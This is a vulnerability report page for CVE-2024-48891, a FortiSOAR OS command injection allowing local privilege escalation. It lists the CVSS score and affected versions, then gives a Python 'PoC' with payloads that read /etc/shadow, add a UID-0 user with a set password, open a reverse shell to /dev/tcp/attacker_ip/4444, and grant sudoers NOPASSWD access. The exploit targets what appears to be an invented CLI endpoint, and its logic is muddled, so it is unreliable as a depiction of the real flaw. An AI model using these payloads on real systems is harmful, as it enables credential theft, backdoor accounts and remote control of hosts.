Security Vulnerability Report
CVE-2024-48891 CVSS 7.0 HIGH

CVE-2024-48891

Published: 2025-10-14 16:15:36
Last Modified: 2025-10-15 17:36:33

Description

An Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability [CWE-78] in FortiSOAR 7.6.0 through 7.6.1, 7.5.0 through 7.5.1, 7.4 all versions, 7.3 all versions may allow an attacker who has already obtained a non-login low privileged shell access (via another hypothetical vulnerability) to perform a local privilege escalation via crafted commands.

CVSS Details

CVSS Score: 7.0
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

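cpe:2.3:a:fortinet:fortisoar:*:*:*:*:*:*:*:* (from 7.3.0 including, up to 7.5.2 excluding) - VULNERABLE
cpe:2.3:a:fortinet:fortisoar:*:*:*:*:*:*:*:* (from 7.6.0 including, up to 7.6.2 excluding) - VULNERABLE
FortiSOAR 7.3 (all versions)
FortiSOAR 7.4 (all versions)
FortiSOAR 7.5.0 through 7.5.1
FortiSOAR 7.6.0 through 7.6.1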

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2024-48891 - FortiSOAR OS Command Injection PoC (Local Privilege Escalation)
# This PoC demonstrates the concept of exploiting OS command injection in FortiSOAR
# Note: Requires prior low-privileged shell access to the FortiSOAR system

import subprocess
import sys


def exploit_command_injection(injected_command):
    """
    Exploit OS command injection in FortiSOAR vulnerable endpoint.
    The vulnerability exists in command execution functions that fail
    to properly sanitize special shell characters.
    """
    # Vulnerable pattern: user input is concatenated directly into shell command
    # without proper escaping or parameterization
    vulnerable_command = f"/opt/fortisoar/bin/fortisoar-cli execute --action 'system_info' --param '{injected_command}'"

    try:
        # Execute the crafted command - the injected payload will run with
        # elevated privileges of the FortiSOAR service process
        result = subprocess.run(
            vulnerable_command,
            shell=True,
            capture_output=True,
            text=True,
            timeout=30
        )
        return result.stdout, result.stderr
    except subprocess.TimeoutExpired:
        return None, "Command timed out"
    except Exception as e:
        return None, str(e)


def main():
    # Example payloads demonstrating privilege escalation via command injection

    # Payload 1: Read sensitive system files
    payload_read = "; cat /etc/shadow #"

    # Payload 2: Create a new root user
    payload_user = "; useradd -o -u 0 -g 0 -M -d /root -s /bin/bash pwned; echo 'pwned:password123' | chpasswd #"

    # Payload 3: Establish reverse shell with elevated privileges
    payload_revshell = "; bash -i >& /dev/tcp/attacker_ip/4444 0>&1 #"

    # Payload 4: Modify sudoers for persistent access
    payload_sudo = "; echo 'attacker ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers #"

    if len(sys.argv) > 1:
        payload = sys.argv[1]
    else:
        payload = payload_read

    print(f"[*] Exploiting CVE-2024-48891 with payload: {payload}")
    stdout, stderr = exploit_command_injection(payload)

    if stdout:
        print(f"[+] Output:\n{stdout}")
    if stderr:
        print(f"[-] Error:\n{stderr}")


if __name__ == "__main__":
    main()

References

https://fortiguard.fortinet.com/psirt/FG-IR-24-412 (Vendor Advisory)